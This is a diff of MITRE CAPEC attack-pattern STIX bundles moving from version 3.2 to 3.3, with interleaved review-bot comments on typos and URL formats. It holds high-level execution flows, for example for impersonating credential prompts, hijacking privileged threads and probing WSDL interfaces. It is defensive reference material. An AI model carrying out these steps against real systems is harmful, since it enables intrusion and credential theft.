"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--2f604e31-9688-49d1-b18f-8dd0ff211c24",
|
||||
"id": "bundle--591a67ba-ccf7-4ac7-bf34-92b4cd9fc393",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -35,7 +35,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--1d16ef81-f101-48ed-9677-382c83180eea",
|
||||
"id": "bundle--a47cd2ad-e95d-49de-9cf2-c443fcd40bf4",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2018-05-31T00:00:00.000Z",
|
||||
"modified": "2019-04-04T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Replace Binaries",
|
||||
"description": "Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. These binaries can be replaced by malware, which can then be executed.",
|
||||
"external_references": [
|
||||
@@ -21,6 +21,18 @@
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/732.html",
|
||||
"external_id": "CWE-732"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Hijack Execution Flow:Executable Installer File Permissions Weakness",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1574/005",
|
||||
"external_id": "T1574.005"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Hijack Execution Flow:Service File Permissions Weakness",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1574/010",
|
||||
"external_id": "T1574.010"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
@@ -36,7 +48,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--31671666-eb8c-472d-acde-b389a062bde4",
|
||||
"id": "bundle--1005a6a5-f870-47a5-b920-fe80fe1b7a0c",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -48,6 +48,7 @@
|
||||
"A WSDL interface may expose a function vulnerable to SQL Injection.",
|
||||
"\n <xhtml:p>The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.</xhtml:p>\n <xhtml:p>Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.</xhtml:p>\n <xhtml:p>Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.</xhtml:p>\n <xhtml:p>Source : \"Seven Steps to XML Mastery, Step 7: Ensure XML Security\", Frank Coyle. See reference section.</xhtml:p>\n "
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p>The first step is exploratory meaning the attacker scans for WSDL documents. The WDSL document written in XML is like a handbook on how to communicate with the web services provided by the target host. It provides an open view of the application (function details, purpose, functional break down, entry points, message types, etc.). This is very useful information for the attacker.</p></li></ol></div><div><h3>Experiment</h3><ol><li> <p>The second step that an attacker would undertake is to analyze the WSDL files and try to find potential weaknesses by sending messages matching the pattern described in the WSDL file. The attacker could run through all of the operations with different message request patterns until a breach is identified.</p></li></ol></div><div><h3>Exploit</h3><ol><li> <p>Once an attacker finds a potential weakness, they can craft malicious content to be sent to the system. For instance the attacker may try to submit special characters and observe how the system reacts to an invalid request. The message sent by the attacker may not be XML validated and cause unexpected behavior.</p></li></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "High",
|
||||
"x_capec_prerequisites": [
|
||||
"A client program connecting to a web service can read the WSDL to determine what functions are available on the server.",
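Review bot: The new `x_capec_execution_flow` value misspells the acronym once (`The WDSL document written in XML`) and its opening sentence reads awkwardly; I would change it to `The first step is exploratory: the attacker scans for WSDL documents. The WSDL document, written in XML, is like a handbook on how to communicate with the web services provided by the target host.` The Exploit step says the attacker's message "may not be XML validated" without saying which side fails to validate; rephrasing it as `The message sent by the attacker may not be validated against the schema by the service, and can cause unexpected behavior` names the weakness the pattern actually depends on. Both edits are text-only inside the HTML-in-JSON string and do not affect parsing.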
|
||||
@@ -59,7 +60,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--55eaa780-1fbe-406d-bafb-9c6a51b85515",
|
||||
"id": "bundle--28b4b281-1499-4770-9e26-e5baea08a334",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -75,7 +75,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--b6dda945-272c-49b4-9507-3016b0072c68",
|
||||
"id": "bundle--579f2dac-d494-4233-963b-a456d4b87b98",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-04-04T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "TCP Flood",
|
||||
"description": "An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain.",
|
||||
"external_references": [
|
||||
@@ -21,6 +21,18 @@
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/770.html",
|
||||
"external_id": "CWE-770"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Endpoint Denial of Service:OS Exhaustion Flood",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1499/001",
|
||||
"external_id": "T1499.001"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Endpoint Denial of Service:Application or System Exploitation",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1499/004",
|
||||
"external_id": "T1499.004"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
@@ -31,7 +43,7 @@
|
||||
"This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server."
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
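Review bot: The new ATT&CK external references (`"url": "https://attack.mitre.org/wiki/Technique/T1499/001"` and `.../T1499/004`) point at the legacy MediaWiki path rather than the current site layout, which serves sub-techniques at `https://attack.mitre.org/techniques/T1499/001/`; the old path may redirect today but is not the canonical form. The same `/wiki/Technique/` URLs are added for T1555.001 in the Pull Data from System Resources section, T1055.003 in the Hijacking a Privileged Thread of Execution section and T1070 in the Log Injection-Tampering-Forging section, so the generator that emits this field should be updated once for all of them. As a point of style, the `description` value `"Endpoint Denial of Service:OS Exhaustion Flood"` joins the parent technique and sub-technique with a bare colon; if that separator is intentional it is worth documenting in the bundle's generator so consumers splitting on it do not have to guess.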
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--8cb18a78-fa2f-49f6-8262-47bc38e20d37",
|
||||
"id": "bundle--f577f288-9e07-469a-905b-672d1c6399d6",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -35,7 +35,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--c3e1e3bb-a05d-4e1f-86d7-746e79b83299",
|
||||
"id": "bundle--3f8d7599-4d76-4d87-9cf5-74e2974dec2c",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -30,7 +30,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--8c9384be-262c-449d-9c97-cc58b2af1218",
|
||||
"id": "bundle--683d3f49-c259-4890-8ebe-fd22285ce28b",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -28,7 +28,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Standard",
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--92c9d12e-2c39-4916-851a-b8d2e5a6c957",
|
||||
"id": "bundle--70697c24-281a-448f-8101-36168df14deb",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -59,7 +59,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--7ae0d04b-ae05-46f4-9b17-389a2adcd5fb",
|
||||
"id": "bundle--4cc6f63d-0ace-43eb-b513-d540597c2ace",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -28,7 +28,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Detailed",
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--50879d03-250d-410a-8734-2302bd82c60b",
|
||||
"id": "bundle--c2750406-8c03-4e0a-b9b9-e701bd9426bf",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-09-30T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Pull Data from System Resources",
|
||||
"description": "An adversary who is authorized or has the ability to search known system resources, does so with the intention of gathering useful information. System resources include files, memory, and other aspects of the target system. In this pattern of attack, the adversary does not necessarily know what they are going to find when they start pulling data. This is different than CAPEC-150 where the adversary knows what they are looking for due to the common location.",
|
||||
"external_references": [
|
||||
@@ -16,6 +16,42 @@
|
||||
"source_name": "capec",
|
||||
"url": "https://capec.mitre.org/data/definitions/545.html",
|
||||
"external_id": "CAPEC-545"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/1239.html",
|
||||
"external_id": "CWE-1239"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/1243.html",
|
||||
"external_id": "CWE-1243"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/1258.html",
|
||||
"external_id": "CWE-1258"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/1266.html",
|
||||
"external_id": "CWE-1266"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/1272.html",
|
||||
"external_id": "CWE-1272"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/1278.html",
|
||||
"external_id": "CWE-1278"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Credentials from Password Stores:Keychain",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1555/001",
|
||||
"external_id": "T1555.001"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
@@ -23,7 +59,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Standard",
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--a060b1a0-dc9e-4a3d-913a-52c16b098e73",
|
||||
"id": "bundle--8bfcf067-0b19-45ba-99ea-06594e771c14",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,9 +8,9 @@
|
||||
"id": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-09-30T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Task Impersonation",
|
||||
"description": "An adversary, through a previously installed malicious application, monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred.",
|
||||
"description": "An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user's privileges. When impersonating an expected task, the adversary monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred. A second approach entails the adversary impersonating an unexpected task, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process requires authentication for some purpose. The user, believing they are interacting with a legitimate task, enters their credentials or authorizes the use of their stored credentials, which the adversary then leverages for nefarious purposes. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user, but may also be used to ride the user's privileges.",
|
||||
"external_references": [
|
||||
{
|
||||
"source_name": "capec",
|
||||
@@ -32,9 +32,36 @@
|
||||
"object_marking_refs": [
|
||||
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
|
||||
],
|
||||
"x_capec_abstraction": "Detailed",
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_abstraction": "Standard",
|
||||
"x_capec_consequences": {
|
||||
"Access_Control": [
|
||||
"Gain Privileges"
|
||||
],
|
||||
"Authentication": [
|
||||
"Gain Privileges"
|
||||
]
|
||||
},
|
||||
"x_capec_example_instances": [
|
||||
"An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.",
|
||||
"An adversary prompts a user to authorize an elevation of privileges, implying that a background task needs additional permissions to execute. The user accepts the privilege elevation, allowing the adversary to execute additional malware or tasks with the user's privileges."
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Determine suitable tasks to exploit: </b>Determine what tasks exist on the target system that may result in a user providing sensitive information.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Determine what tasks prompt a user for their credentials.</td></tr><tr><td>Determine what tasks may prompt a user to authorize a process to execute with elevated privileges.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Impersonate Task: </b>Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials or to ride the user's privileges.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Prompt a user for their credentials, while making the user believe the credential request is legitimate.</td></tr><tr><td>Prompt a user to authorize a task to run with elevated privileges, while making the user believe the request is legitimate.</td></tr></tbody></table></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "Medium",
|
||||
"x_capec_prerequisites": [
|
||||
"The adversary must already have access to the target system via some means.",
|
||||
"A legitimate task must exist that an adversary can impersonate to glean credentials.",
|
||||
"The user's privileges allow them to execute certain tasks with elevated privileges."
|
||||
],
|
||||
"x_capec_resources_required": [
|
||||
"Malware or some other means to initially comprise the target system.",
|
||||
"Additional malware to impersonate a legitimate task."
|
||||
],
|
||||
"x_capec_skills_required": {
|
||||
"Low": "Once an adversary has gained access to the target system, impersonating a task is trivial."
|
||||
},
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
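Review bot: The new `x_capec_resources_required` entry `"Malware or some other means to initially comprise the target system."` has a typo — "comprise" should read "compromise" (`"Malware or some other means to initially compromise the target system."`). Since this text is STIX data that downstream tooling and the CAPEC site render verbatim, the fix belongs in the upstream CAPEC XML that this bundle is generated from rather than in the JSON alone, otherwise the next regeneration reintroduces it.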
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--0474e6df-9d86-4a7c-b138-2040c6d9f8a8",
|
||||
"id": "bundle--1e2770a9-74ca-41d3-86c7-93a69aa2747a",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -23,7 +23,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Detailed",
|
||||
"x_capec_status": "Deprecated",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--76153e9c-11e7-41aa-9e71-dc632eeee30a",
|
||||
"id": "bundle--c0acdf8a-8880-4144-b238-f0ab5d1946d6",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2017-01-06T00:00:00.000Z",
|
||||
"modified": "2017-01-06T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Absolute Path Traversal",
|
||||
"description": "An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as \"..\" to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.",
|
||||
"external_references": [
|
||||
@@ -52,7 +52,7 @@
|
||||
"Medium": "Programming attacks."
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--e1d41b32-49de-4525-9f31-161c37f30a16",
|
||||
"id": "bundle--d18455b7-d4c3-463c-948f-e638865a808b",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2015-11-09T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Probe iOS Screenshots",
|
||||
"description": "An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface.",
|
||||
"external_references": [
|
||||
@@ -31,7 +31,7 @@
|
||||
"This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device)."
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--6059f8e9-ee71-4ff8-8536-5fc2ab8eebee",
|
||||
"id": "bundle--b53e9c69-15fc-480f-83dc-02f61a974424",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -54,7 +54,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--c5d5ceb5-8cbb-4969-bc1a-905b896c2b3b",
|
||||
"id": "bundle--a000f612-87af-4832-bab9-eb16f3f49d41",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -42,6 +42,7 @@
|
||||
"x_capec_example_instances": [
|
||||
"Using MITM techniques, an attacker launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the attacker to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur."
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p>Determine the configuration levels of either the server or client being targeted, preferably both. This is not a hard requirement, as the attacker can simply assume commonly exploitable configuration settings and blindly attempt them.</p></li></ol></div><div><h3>Experiment</h3><ol><li> <p>Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one's self at a place on the network to intercept and control the flow of data between client and server, e.g. MITM (man in the middle).</p></li></ol></div><div><h3>Exploit</h3><ol><li> <p>Insert the malicious data into the stream that takes advantage of the configuration flaw.</p></li></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "Low",
|
||||
"x_capec_prerequisites": [
|
||||
"Access to the client/server stream."
|
||||
@@ -53,7 +54,7 @@
|
||||
"High": "The attacker needs real-time access to network traffic in such a manner that the attacker can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles."
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--ac1bb851-9633-44ec-a1bd-62fb6a99fba9",
|
||||
"id": "bundle--8a215d40-3701-4fa1-a361-71054a0ced47",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -23,7 +23,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Standard",
|
||||
"x_capec_status": "Deprecated",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--a55290e7-137b-4568-8e30-961ebe153367",
|
||||
"id": "bundle--c4622028-d6a0-4931-bfd2-c38ef8aa7c8f",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Hijacking a Privileged Thread of Execution",
|
||||
"description": "Adversaries can sometimes hijack a privileged thread from the underlying system through synchronous (calling a privileged function that returns incorrectly) or asynchronous (callbacks, signal handlers, and similar) means. This can allow the adversary to access functionality the system's designer didn't intend for them to, but they may also go undetected or deny other users essential services in a catastrophic (or insidiously subtle) way.",
|
||||
"external_references": [
|
||||
@@ -21,6 +21,12 @@
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/270.html",
|
||||
"external_id": "CWE-270"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Process Injection:Thread Execution Hijacking",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1055/003",
|
||||
"external_id": "T1055.003"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
@@ -48,6 +54,7 @@
|
||||
"x_capec_example_instances": [
|
||||
"Adversary targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread (e.g., a system call). The adversary could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations."
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p>Adversary determines the underlying system thread that is subject to user-control</p></li></ol></div><div><h3>Experiment</h3><ol><li> <p>Adversary then provides input, perhaps by way of environment variables for the process in question, that affect the executing thread</p></li></ol></div><div><h3>Exploit</h3><ol><li> <p>Upon successful hijacking, the adversary enjoys elevated privileges, and can possibly have the hijacked thread do their bidding.</p></li></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "Low",
|
||||
"x_capec_prerequisites": [
|
||||
"The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users",
|
||||
@@ -61,7 +68,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Very High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--6d216e07-0cb2-41fb-81fa-d4e5facd6cf3",
|
||||
"id": "bundle--c1f4169b-a2e2-4689-950e-2f660c5090c1",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-09-30T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Escaping a Sandbox by Calling Signed Code in Another Language",
|
||||
